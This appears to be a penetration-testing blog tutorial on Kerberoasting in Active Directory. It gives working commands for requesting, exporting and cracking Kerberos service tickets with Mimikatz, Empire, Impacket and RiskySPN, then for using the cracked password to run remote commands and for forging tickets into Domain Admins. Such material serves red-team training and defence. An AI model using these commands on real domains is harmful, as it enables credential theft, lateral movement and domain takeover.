The process of cracking Kerberos service tickets and rewriting them in order to gain access to the targeted service is called Kerberoast. This is very common attack in red team engagements since it doesn’t require any interaction with the service as legitimate active directory access can be used to request and export the service ticket which can be cracked offline in order to retrieve the plain-text password of the service. This is because service tickets are encrypted with the hash (NTLM) of the service account so any domain user can dump hashes from services without the need to get a shell into the system that is running the service.

Red Teams usually attempt to crack tickets which have higher possibility to be configured with a weak password. Successful cracking of the ticket will not only give access to the service but sometimes it can lead to full domain compromise as often services might run under the context of an elevated account. These tickets can be identified by considering a number of factors such as:

  • SPNs bind to domain user accounts
  • Password last set
  • Password expiration
  • Last logon

Specifically the Kerberoast attack involves five steps:

  1. SPN Discovery
  2. Request Service Tickets
  3. Export Service Tickets
  4. Crack Service Tickets
  5. Rewrite Service Tickets & RAM Injection

The discovery of services in a network by querying the Active Directory for service principal names has been already covered in the SPN Discovery article.

Request Service Tickets

The easiest method to request the service ticket for a specific SPN is through PowerShell as it has been introduced by Tim Medin during his DerbyCon 4.0 talk.

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80"
Service Ticket Request
Service Ticket Request

Execution of the klist command will list all the available cached tickets.

Kerberoast - Obtain Cached Tickets with klist
Obtain Cached Tickets with klist

An alternative solution to request service tickets is through Mimikatz by specifying as a target the service principal name.

kerberos::ask /target:PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80
Mimikatz - Request Service Ticket
Mimikatz – Request Service Ticket

Similarly to klist the list of Kerberos tickets that exist in memory can be retrieved through Mimikatz. From an existing PowerShell session, the Invoke-Mimikatz script will output all the tickets.

Invoke-Mimikatz -Command '"kerberos::list"'
Invoke-Mimikatz - List Memory Tickets
Invoke-Mimikatz – List Memory Tickets

Alternatively loading the Kiwi module will add some additional Mimikatz commands which can performed the same task.

load kiwi
Kiwi - Kerberos Ticket List
Kiwi – Kerberos Ticket List

Or by executing a custom Kiwi command:

kiwi_cmd kerberos::list
Kiwi - Kerberos Ticket List Command
Kiwi – Kerberos Ticket List Command

Impacket has a python module which can request Kerberos service tickets that belong to domain users only which should be easier to cracked compared to computer accounts service tickets. However requires valid domain credentials in order to interact with the Active Directory since it will executed from a system that is not part of a domain.

./ -request pentestlab.local/test
Impacket - Service Ticket Request
Impacket – Service Ticket Request

The service account hashes will also retrieved in John the Ripper format.

Impacket - Service Hash
Impacket – Service Hash

Identification of weak service tickets can be also performed automatically with a PowerShell module that was developed by Matan Hart and is part of RiskySPN. The purpose of this module is to perform an audit on the available service tickets that belong to users in order to find the tickets that are most prone to contain a weak password based on the user account and password expiration.

Find-PotentiallyCrackableAccounts -FullData -Verbose
RiskySPN - Audit Service Tickets
RiskySPN – Audit Service Tickets

The script will provide more detailed output compare to klist and Mimikatz including the Group information, password age and crack window.

RiskySPN - Ticket Information
RiskySPN – Ticket Information

Executing the same module with the domain parameter will return all the user accounts that have an associated service principal name.

Find-PotentiallyCrackableAccounts -Domain "pentestlab.local"
RiskySPN - Service Tickets
RiskySPN – Service Tickets

Service ticket information can be also exported in CSV format for offline review.


RiskySPN - CSV Export

All the ticket information that was appeared in the console will be written into the file.

RiskySPN - Ticket Information CSV
RiskySPN – Ticket Information CSV

Part of the same repository there is also a script which can obtain a service ticket for a service instance by its SPN.

TGSCipher - Service Ticket Information
TGSCipher – Service Ticket Information

The Kerberoast toolkit by Tim Medin has been re-implemented to automate the process. Auto-Kerberoast contains the original scripts of Tim including  two PowerShell scripts that contain various functions that can be executed to request, list and export service tickets in Base64, John and Hashcat format.

AutoKerberoast - ListUserSPNs
AutoKerberoast – ListUserSPNs

There is also a domain parameter which can list only the SPNs of a particular domain.

List-UserSPNs -Domain "pentestlab.local"
AutoKerberoast - ListUserSPNs with Domain Parameter
AutoKerberoast – ListUserSPNs with Domain Parameter

Export Service Tickets

Mimikatz is the standard tool which can export Kerberos service tickets. From a PowerShell session the following command will list all the available  tickets in memory and will save them in the remote host.

Invoke-Mimikatz -Command '"kerberos::list /export"'
Invoke-Mimikatz - Export Service Tickets
Invoke-Mimikatz – Export Service Tickets

Similarly PowerShell Empire has a module which automates the task of Kerberos service ticket extraction.

usemodule credentials/mimikatz/extract_tickets
Empire - Extract Service Tickets Module
Empire – Extract Service Tickets Module

The module will use the Invoke-Mimikatz function to execute automatically the commands below.

kerberos::list /export
Empire - Export Service Tickets
Empire – Export Service Tickets

Ticket hashes for services that support Kerberos authentication can extracted directly with a PowerShell Empire module. The format of the hash can be extracted either as John or Hashcat.

usemodule credentials/invoke_kerberoast
Empire - Kerberoast Module
Empire – Kerberoast Module

The module will retrieve the password hashes for all the service accounts.

Empire - Kerberoast Hash
Empire – Kerberoast Hash

The AutoKerberoast PowerShell script will request and extract all the service tickets in base64 format.

AutoKerberoast - Invoke-AutoKerberoast Base64
AutoKerberoast – Invoke-AutoKerberoast Base64

There is also a script part of the AutoKerberoast repository which will display the extracted tickets in hashcat compatible format.

AutoKerberoast - Service Ticket Hash
AutoKerberoast – Service Ticket Hash

Tickets that belong to elevated groups for a particular domain can be also extracted for a more targeted Kerberoasting.

Invoke-AutoKerberoast -GroupName "Domain Admins" -Domain pentestlab.local -HashFormat John
AutoKerberoast - Service Ticket Hashes of Particular Domain and Group
AutoKerberoast – Service Ticket Hashes of Particular Domain and Group

The Get-TGSCipher PowerShell module that Matan Hart developed can extract the password hash of a service ticket in three different formats: John, Hashcat and Kerberoast. The service principal name of the associated service that the script requires can be retrieved during the SPN discovery process.

TGSCipher - Service Ticket Hash
TGSCipher – Service Ticket Hash

The benefit of using Get-TGSCipher function is that eliminates the need of Mimikatz for ticket export which can trigger alerts to the blue team and also obtaining the hash directly reduces the step of converting the ticket to john format.

Crack Service Tickets

The python script tgsrepcrack is part of Tim Medin Kerberoast toolkit and can crack Kerberos tickets by supplying a password list.

python /root/Desktop/passwords.txt PENTESTLAB_001.kirbi
Kerberoast - Crack Service Ticket
Kerberoast – Crack Service Ticket

Lee Christensen developed extractServiceTicketParts python script which can extract the hash of a service ticket and tgscrack in Go language which can crack the hash.

python PENTESTLAB_001.kirbi
tgscrack - Extract the Hash from Service Ticket
tgscrack – Extract the Hash from Service Ticket

The binary requires the hashfile and wordlist local paths.

tgscrack.exe -hashfile hash.txt -wordlist passwords.txt
tgscrack - Cracking the Service Hash
tgscrack – Cracking the Service Hash

The password will appear in plain-text.

If PowerShell remoting is enabled then the password that has been retrieved from the service ticket can be used for execution of remote commands and for other lateral movement operations.

$pass = 'Password123' | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList 'PENTESTLAB_001', $pass
Invoke-Command -ScriptBlock {get-process} -ComputerName WIN-PTELU2U07KG.PENTESTLAB.LOCAL -Credential $creds
Kerberoast - Command Execution
Kerberoast – Command Execution

The list of running processes will be retrieved:

Kerberoast - List of Processes
Kerberoast – List of Processes

Rewrite Service Tickets & RAM Injection

Kerberos tickets are signed with the NTLM hash of the password. If the ticket hash has been cracked then it is possible to  rewrite the ticket with Kerberoast python script. This tactic will allow to impersonate any domain user or a fake account when the service is going to be accessed. Additionally privilege escalation is also possible as the user can be added into an elevated group such as Domain Admins.

python -p Password123 -r PENTESTLAB_001.kirbi -w PENTESTLAB.kirbi -u 500
python -p Password123 -r PENTESTLAB_001.kirbi -w PENTESTLAB.kirbi -g 512
Kerberoast - Rewrite Service Tickets
Kerberoast – Rewrite Service Tickets

The new ticket can be injected back into the memory with the following Mimikatz command in order to perform authentication with the targeted service via Kerberos protocol.

kerberos::ptt PENTESTLAB.kirbi



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s